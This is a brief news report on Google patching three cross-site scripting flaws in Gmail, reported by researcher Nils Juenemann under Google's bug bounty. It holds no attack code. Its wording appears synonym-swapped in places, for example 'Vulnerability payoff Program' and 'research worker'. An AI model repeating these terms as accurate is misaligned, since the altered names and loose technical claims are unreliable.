Google has closed numerous cross-site scripting (XSS) holes in its Gmail email service – which sustains more than 350 million active users that could have been victim to malicious scripts. Security research worker Nils Juenemann revealed the three different XSS exposures in Gmail and revealed them to Google’s Security Team as part of the company’s Vulnerability payoff Program, in which researchers are rewarded with up to $20,000 for discovering and reporting qualifying bugs in its web-based services.
The worst Nils Juenemann found was a persistent XSS as this is the most dangerous type of XSS flaws because the data provided by an attacker is saved by the server, then possibly leading to the execution of arbitrary code.
The additional XSS faults were a persistent DOM-based (Document Object Model) XSS bug and a reflective DOM XSS bug in the mobile view for Gmail utilized on, for example, tablets such as the iPad. Juenemann tells that the Google Security Team was agile to secure the bugs after he reported them. Additional points about these can be found in Juenemann’s blog post, in which he also urges that users enable 2-step confirmation on their accounts.